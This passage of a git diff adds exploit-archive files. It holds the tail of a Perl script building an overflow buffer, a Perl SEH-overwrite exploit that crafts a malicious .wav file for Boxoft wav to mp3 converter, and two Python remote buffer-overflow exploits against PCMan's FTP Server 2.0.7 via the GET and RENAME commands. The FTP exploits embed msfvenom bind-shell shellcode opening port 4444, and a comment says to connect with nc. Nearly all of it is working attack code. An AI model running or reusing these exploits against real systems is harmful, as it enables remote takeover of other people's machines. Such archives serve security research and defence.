\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30".
+"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31";
+
+for($i=1;$i<=4212;$i++){
+$buffer="$buffer\\x30"; # 4212 X "0"
+}
+$buffer=$buffer."\x31\x31\x31\x31\x31\x31\x31\x31\x0a\x7d\x7d\x7d"; # EOF = }}}
+
+print FILE $buffer;
+close FILE;
diff --git a/platforms/windows/local/38035.pl b/platforms/windows/local/38035.pl
new file mode 100755
index 000000000..1d325f9de
--- /dev/null
+++ b/platforms/windows/local/38035.pl
@@ -0,0 +1,41 @@
+#Exploit Title: Boxoft wav to mp3 converter SEH bypass technique tested on Win7x64   
+# Date: 8-31-2015
+# Software Link: http://www.boxoft.com/wav-to-mp3/
+# Exploit Author: Robbie Corley
+# Contact: c0d3rc0rl3y@gmail.com
+# Website: 
+# Target: Windows 7 Enterprise x64
+# CVE: 
+# Category: Local Exploit
+#
+# Description:
+# A buffer overflow was found after constructing a .wav payload over 4000 characters and attempting to convert the payload to a .mp3 file
+
+my $buff = "\x41" x 4132;
+#my $nseh = "\x42" x 4;
+#my $seh = "\x43" x 4;
+my $endofbuff   = "\x41" x 5860;
+
+
+$nseh = "\xeb\x06\x90\x90";  # jump to shellcode
+$seh = pack('V',0x0040144c); # pop pop retn
+
+#MessageBox Shellc0de 
+#https://www.exploit-db.com/exploits/28996/
+
+my $shellcode =
+"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
+"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
+"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
+"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
+"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
+"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
+"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
+"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
+
+#$nops = "\x90" x 20; 
+
+open(myfile,'>crash3r.wav');
+
+print myfile $buff.$nseh.$seh.$shellcode.$endofbuff;
+close (myfile);
\ No newline at end of file
diff --git a/platforms/windows/remote/38003.py b/platforms/windows/remote/38003.py
new file mode 100755
index 000000000..1f5bd489f
--- /dev/null
+++ b/platforms/windows/remote/38003.py
@@ -0,0 +1,62 @@
+#!/usr/bin/python
+
+# Exploit Title: PCMan's FTP Server v2.0 - GET command buffer overflow (remote shell)
+# Date:  28 Aug 2015
+# Exploit Author: Koby
+# Vendor Homepage: http://pcman.openfoundry.org/
+# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
+# Version: 2.0.7
+# Tested on: Windows XP SP3
+# CVE : N/A
+
+import socket
+import sys
+
+# msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby
+# Payload size: 352 bytes
+shellcode = (
+"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" 
+"\x0e\x69\x8c\x9b\xa3\x83\xee\xfc\xe2\xf4\x95\x64\x19\xa3" 
+"\x69\x8c\xfb\x2a\x8c\xbd\x5b\xc7\xe2\xdc\xab\x28\x3b\x80" 
+"\x10\xf1\x7d\x07\xe9\x8b\x66\x3b\xd1\x85\x58\x73\x37\x9f" 
+"\x08\xf0\x99\x8f\x49\x4d\x54\xae\x68\x4b\x79\x51\x3b\xdb" 
+"\x10\xf1\x79\x07\xd1\x9f\xe2\xc0\x8a\xdb\x8a\xc4\x9a\x72" 
+"\x38\x07\xc2\x83\x68\x5f\x10\xea\x71\x6f\xa1\xea\xe2\xb8" 
+"\x10\xa2\xbf\xbd\x64\x0f\xa8\x43\x96\xa2\xae\xb4\x7b\xd6" 
+"\x9f\x8f\xe6\x5b\x52\xf1\xbf\xd6\x8d\xd4\x10\xfb\x4d\x8d" 
+"\x48\xc5\xe2\x80\xd0\x28\x31\x90\x9a\x70\xe2\x88\x10\xa2" 
+"\xb9\x05\xdf\x87\x4d\xd7\xc0\xc2\x30\xd6\xca\x5c\x89\xd3" 
+"\xc4\xf9\xe2\x9e\x70\x2e\x34\xe4\xa8\x91\x69\x8c\xf3\xd4" 
+"\x1a\xbe\xc4\xf7\x01\xc0\xec\x85\x6e\x73\x4e\x1b\xf9\x8d" 
+"\x9b\xa3\x40\x48\xcf\xf3\x01\xa5\x1b\xc8\x69\x73\x4e\xc9" 
+"\x61\xd5\xcb\x41\x94\xcc\xcb\xe3\x39\xe4\x71\xac\xb6\x6c" 
+"\x64\x76\xfe\xe4\x99\xa3\x78\xd0\x12\x45\x03\x9c\xcd\xf4" 
+"\x01\x4e\x40\x94\x0e\x73\x4e\xf4\x01\x3b\x72\x9b\x96\x73" 
+"\x4e\xf4\x01\xf8\x77\x98\x88\x73\x4e\xf4\xfe\xe4\xee\xcd" 
+"\x24\xed\x64\x76\x01\xef\xf6\xc7\x69\x05\x78\xf4\x3e\xdb" 
+"\xaa\x55\x03\x9e\xc2\xf5\x8b\x71\xfd\x64\x2d\xa8\xa7\xa2" 
+"\x68\x01\xdf\x87\x79\x4a\x9b\xe7\x3d\xdc\xcd\xf5\x3f\xca" 
+"\xcd\xed\x3f\xda\xc8\xf5\x01\xf5\x57\x9c\xef\x73\x4e\x2a" 
+"\x89\xc2\xcd\xe5\x96\xbc\xf3\xab\xee\x91\xfb\x5c\xbc\x37" 
+"\x6b\x16\xcb\xda\xf3\x05\xfc\x31\x06\x5c\xbc\xb0\x9d\xdf" 
+"\x63\x0c\x60\x43\x1c\x89\x20\xe4\x7a\xfe\xf4\xc9\x69\xdf" 
+"\x64\x76")
+
+
+# buffer overflow was found by fuzzing with ftp_pre_post (metasploit)
+# bad data is a string of 2007 "A" characters to get to an EIP overwrite
+# followed by the JMP ESP instruction 0x7c9d30eb in SHELL32.dll
+baddata = '\x41'*2007+'\xeb\x30\x9d\x7c'
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+
+# change target IP/port as needed
+# run this script then to connect use nc for your windows shell
+# nc [target IP address] 4444
+connect=s.connect(('192.168.1.135',21))
+s.recv(1024)
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASS anonymous\r\n')
+s.recv(1024)
+s.send('GET ' + baddata +'\x90'*15+ shellcode+ '\r\n')
+s.close()
diff --git a/platforms/windows/remote/38013.py b/platforms/windows/remote/38013.py
new file mode 100755
index 000000000..fc17712f6
--- /dev/null
+++ b/platforms/windows/remote/38013.py
@@ -0,0 +1,57 @@
+#!/usr/bin/python
+# Exploit Title: PCMan's FTP Server v2.0 - RENAME command remote buffer overflow
+# Date:  29 Aug 2015
+# Exploit Author: Koby
+# Vendor Homepage: http://pcman.openfoundry.org/
+# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
+# Version: 2.0.7
+# Tested on: Windows XP SP3
+
+import socket
+import sys
+
+# msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby
+# Payload size: 352 bytes
+shellcode = (
+"\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
+"\x0e\xb3\x93\xd2\x17\x83\xee\xfc\xe2\xf4\x4f\x7b\x50\x17"
+"\xb3\x93\xb2\x9e\x56\xa2\x12\x73\x38\xc3\xe2\x9c\xe1\x9f" 
+"\x59\x45\xa7\x18\xa0\x3f\xbc\x24\x98\x31\x82\x6c\x7e\x2b"
+"\xd2\xef\xd0\x3b\x93\x52\x1d\x1a\xb2\x54\x30\xe5\xe1\xc4" 
+"\x59\x45\xa3\x18\x98\x2b\x38\xdf\xc3\x6f\x50\xdb\xd3\xc6" 
+"\xe2\x18\x8b\x37\xb2\x40\x59\x5e\xab\x70\xe8\x5e\x38\xa7" 
+"\x59\x16\x65\xa2\x2d\xbb\x72\x5c\xdf\x16\x74\xab\x32\x62" 
+"\x45\x90\xaf\xef\x88\xee\xf6\x62\x57\xcb\x59\x4f\x97\x92" 
+"\x01\x71\x38\x9f\x99\x9c\xeb\x8f\xd3\xc4\x38\x97\x59\x16" 
+"\x63\x1a\x96\x33\x97\xc8\x89\x76\xea\xc9\x83\xe8\x53\xcc" 
+"\x8d\x4d\x38\x81\x39\x9a\xee\xfb\xe1\x25\xb3\x93\xba\x60" 
+"\xc0\xa1\x8d\x43\xdb\xdf\xa5\x31\xb4\x6c\x07\xaf\x23\x92" 
+"\xd2\x17\x9a\x57\x86\x47\xdb\xba\x52\x7c\xb3\x6c\x07\x7d" 
+"\xbb\xca\x82\xf5\x4e\xd3\x82\x57\xe3\xfb\x38\x18\x6c\x73" 
+"\x2d\xc2\x24\xfb\xd0\x17\xa2\xcf\x5b\xf1\xd9\x83\x84\x40" 
+"\xdb\x51\x09\x20\xd4\x6c\x07\x40\xdb\x24\x3b\x2f\x4c\x6c" 
+"\x07\x40\xdb\xe7\x3e\x2c\x52\x6c\x07\x40\x24\xfb\xa7\x79" 
+"\xfe\xf2\x2d\xc2\xdb\xf0\xbf\x73\xb3\x1a\x31\x40\xe4\xc4" 
+"\xe3\xe1\xd9\x81\x8b\x41\x51\x6e\xb4\xd0\xf7\xb7\xee\x16" 
+"\xb2\x1e\x96\x33\xa3\x55\xd2\x53\xe7\xc3\x84\x41\xe5\xd5" 
+"\x84\x59\xe5\xc5\x81\x41\xdb\xea\x1e\x28\x35\x6c\x07\x9e" 
+"\x53\xdd\x84\x51\x4c\xa3\xba\x1f\x34\x8e\xb2\xe8\x66\x28" 
+"\x22\xa2\x11\xc5\xba\xb1\x26\x2e\x4f\xe8\x66\xaf\xd4\x6b" 
+"\xb9\x13\x29\xf7\xc6\x96\x69\x50\xa0\xe1\xbd\x7d\xb3\xc0" 
+"\x2d\xc2")
+
+# buffer overflow was found by fuzzing with ftp_pre_post (metasploit)
+# bad data is a string of 2004 "A" characters to get to a EIP overwrite
+# followed by the JMP ESP instruction 0x7cb48eed in SYSTEM32.dll
+baddata = '\x41'*2004+'\xed\x8e\xb4\x7c'
+
+# login to ftp followed by sending the bad data & payload
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect(('192.168.1.135',21))
+s.recv(1024)
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASS anonymous\r\n')
+s.recv(1024)
+s.send('RENAME ' + baddata +'\x90'*50+ shellcode+ '\r\n')
+s.close()